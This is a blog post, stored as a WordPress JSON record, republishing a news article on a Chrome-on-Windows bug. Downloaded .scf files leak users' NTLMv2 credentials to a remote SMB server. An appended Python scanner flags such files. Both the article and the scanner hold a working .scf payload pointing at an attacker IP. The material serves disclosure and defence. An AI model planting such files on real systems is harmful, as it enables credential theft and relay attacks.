{"id":286895,"date":"2017-05-17T15:31:49","date_gmt":"2017-05-17T20:31:49","guid":{"rendered":"http:\/\/itblog.lcisd.net\/?p=286895"},"modified":"2017-05-17T15:31:49","modified_gmt":"2017-05-17T20:31:49","slug":"chrome-on-windows-has-credential-theft-bug","status":"publish","type":"post","link":"https:\/\/itblog.lcisd.net\/?p=286895","title":{"rendered":"Chrome on Windows has credential theft bug"},"content":{"rendered":"<h1>Chrome on Windows has credential theft bug<\/h1>\n<h2>.SCF files present ID, password to fetch icons for attack file<\/h2>\n<div class=\"article_head multi_page\">\n<div class=\"byline\"><span class=\"dateline\"> 17 May 2017 at 02:09, <\/span> <a class=\"alt_colour dcl\" title=\"Read more by this author\" href=\"https:\/\/www.theregister.co.uk\/Author\/2242\">Richard Chirgwin<\/a><\/div>\n<div class=\"byline\">\n<hr \/>\n<\/div>\n<\/div>\n<div id=\"body\">\n<p>Google&#8217;s Chrome team is working to fix a credential theft bug that strikes if the browser is running on Microsoft Windows.<\/p>\n<p>The bug is exploited if a user is tricked into clicking a link that downloads a Windows .scf file (the ancient Shell Command File format, a shortcut to Show Desktop since Windows 98).<\/p>\n<p>This exploits two things: how Chrome handles .scf files, and how Windows handles them.<\/p>\n<p>Most download links are sanitised by Chrome \u2013 for example, as discoverers DefenseCode <a href=\"http:\/\/defensecode.com\/news_article.php?id=21\" target=\"_blank\" rel=\"noopener noreferrer\">write<\/a>, since Stuxnet the browser has forced a .download extension onto Windows LNK files \u2013 but not .scf files.<\/p>\n<p>That arrangement means that if the user clicks the link, the malicious .scf file will lie dormant in the <code>\/Downloads<\/code> directory until the next time the user opens the folder.<\/p>\n<p>Here&#8217;s where the Windows flaw comes in: merely viewing the folder will trigger Windows to try and retrieve an icon associated with the .scf 
file.<\/p>\n<p>To retrieve the icon, the user&#8217;s machine opens an SMB connection to the server named in the file and authenticates to it automatically with NTLM, presenting the user ID together with an NTLMv2 challenge-response computed from the password hash \u2013 the domain account on a corporate network, or the home group&#8217;s credentials if it&#8217;s a personal machine. No prompt is shown and no click on the file is needed.<\/p>\n<p>Since the attacker runs that server, the user ID and NTLMv2 response land with the attacker.<\/p>\n<p>If the .scf file contains this code:<\/p>\n<pre>[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n<\/pre>\n<p>\u2026 then Explorer will connect to the attacker&#8217;s IP (the host part of the <code>IconFile<\/code> UNC path) and present the user ID and NTLMv2 response there.<\/p>\n<p>Because what leaks is an NTLMv2 challenge-response rather than the password itself, recovering the password requires offline brute-force cracking, but DefenseCode points out that the captured authentication can also be relayed live to other services that accept NTLM.<\/p>\n<p>\u201cThe remote SMB server set up by the attacker is ready to capture the victim&#8217;s username and NTLMv2 password hash for offline cracking or <b>relay the connection<\/b> to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password,\u201d writes DefenseCode&#8217;s Bosko Stankovic [emphasis added].<\/p>\n<p>Password brute-forcing is only moderately difficult, the post says: an NVIDIA GTX 1080 card should manage to recover an eight-character password in less than a day.<\/p>\n<p>While users wait for a fix from Google, Chrome users should go to their Advanced settings and turn on the option that makes Chrome ask where each downloaded file is to be saved: the save dialog then shows the .scf extension before the file reaches the Downloads folder. That only helps the user spot the file before it lands; it does nothing for an .scf file that is already on disk. Blocking outbound SMB (TCP port 445) from workstations to the Internet at the perimeter firewall stops the credential leak to external hosts regardless of how the file arrived.<\/p>\n<p>Google <a href=\"https:\/\/threatpost.com\/chrome-browser-hack-opens-door-to-credential-theft\/125686\/\" target=\"_blank\" rel=\"noopener noreferrer\">told<\/a> Kaspersky&#8217;s ThreatPost it&#8217;s aware of the issue and is working on a fix. 
\u00ae<\/p>\n<\/div>\n<div><a href=\"https:\/\/www.theregister.co.uk\/2017\/05\/17\/chrome_on_windows_has_credential_theft_bug\/\" target=\"_blank\" rel=\"noopener noreferrer\">Entire article and comments.<\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Chrome on Windows has credential theft bug .SCF files present ID, password to fetch icons for attack file 17 May 2017 at 02:09, Richard Chirgwin Google&#8217;s Chrome team is working to fix a credential theft bug that strikes if the<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-286895","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts\/286895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=286895"}],"version-history":[{"count":2,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts\/286895\/revisions"}],"predecessor-version":[{"id":286897,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=\/wp\/v2\/posts\/286895\/revisions\/286897"}],"wp:attachment":[{"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=286895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=286895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itblog.lcisd.net\/index.php?rest_route=%2Fwp%2Fv2%2Fta
gs&post=286895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
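The article above describes the trigger precisely: an .scf file whose `[Shell]` `IconFile` entry is a UNC path to a host the attacker controls, which Explorer resolves (and authenticates to over SMB with NTLM) as soon as the folder is viewed. As an added example, not code from the article, The Register or DefenseCode, the following Python script parses the INI-style .scf format, extracts the `IconFile` target, and flags files whose icon path points at a host outside the organisation. The `.corp.example` internal-name suffix, the sample .scf contents and the scratch folder layout are assumptions made for illustration; the benign sample is the shape of the stock "Show Desktop.scf".

```python
"""Flag .scf files whose IconFile would make Explorer authenticate to a remote SMB host.

Added example, not code from the article or from DefenseCode.  It parses the
INI-style .scf format, extracts the IconFile value and decides whether merely
viewing the containing folder would send NTLM authentication to a host
outside the organisation.  INTERNAL_SUFFIX and the sample files are
assumptions made for illustration.
"""
import ipaddress
import re
from pathlib import Path

# Assumption: internal hostnames end in this suffix; everything else that is
# not a private/loopback/link-local IP literal is treated as external.
INTERNAL_SUFFIX = ".corp.example"

# UNC path: \\host\share[\path].  Captures the host part.  WebDAV-style hosts
# such as host@SSL@443 are captured whole and treated as hostnames.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Constructed samples.  The first is the classic Show Desktop.scf; the second
# is the shape of file the article describes; the third points at an
# internal file server.
BENIGN_SCF = "[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
MALICIOUS_SCF = "[Shell]\r\nIconFile=\\\\170.170.170.170\\icon\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n"
INTERNAL_SCF = "[Shell]\r\nIconFile=\\\\10.0.0.5\\icons\\desk.ico\r\n"


def parse_scf(text):
    """Parse .scf content into {section: {key: value}}.

    Sections and keys are lower-cased; values keep their case.  Handles a
    UTF-8 BOM, CRLF line endings and comment lines.
    """
    sections = {}
    current = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def icon_target_host(text):
    """Return the host named by [Shell] IconFile if it is a UNC path, else None."""
    value = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_RE.match(value)
    return match.group(1) if match else None


def is_external(host):
    """True if Explorer would reach this host across the organisation boundary."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: trust only names under the internal suffix.
        # Bare short names are flagged too; a false positive is the safer error.
        return not host.lower().endswith(INTERNAL_SUFFIX)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def classify(text):
    """'local' (no UNC icon), 'internal', or 'external' (credential leak risk)."""
    host = icon_target_host(text)
    if host is None:
        return "local"
    return "external" if is_external(host) else "internal"


def scan_folder(folder):
    """Classify every .scf file under folder; returns {path: verdict}."""
    return {
        str(p): classify(p.read_bytes().decode("utf-8", errors="replace"))
        for p in Path(folder).rglob("*.scf")
    }


if __name__ == "__main__":
    import tempfile

    # Stage the constructed samples in a scratch "Downloads" folder and scan it.
    with tempfile.TemporaryDirectory() as downloads:
        for name, body in [("Show Desktop.scf", BENIGN_SCF), ("invoice.scf", MALICIOUS_SCF)]:
            Path(downloads, name).write_bytes(body.encode("utf-8"))
        for path, verdict in sorted(scan_folder(downloads).items()):
            print(f"{verdict:9s} {path}")
```

Run it against a user's real Downloads folder (or a mail-gateway quarantine) to find files that would fire on the next folder view; an "external" verdict is the case the article describes, and the file should be deleted rather than opened, since Explorer has very likely already made the SMB connection once the folder was displayed.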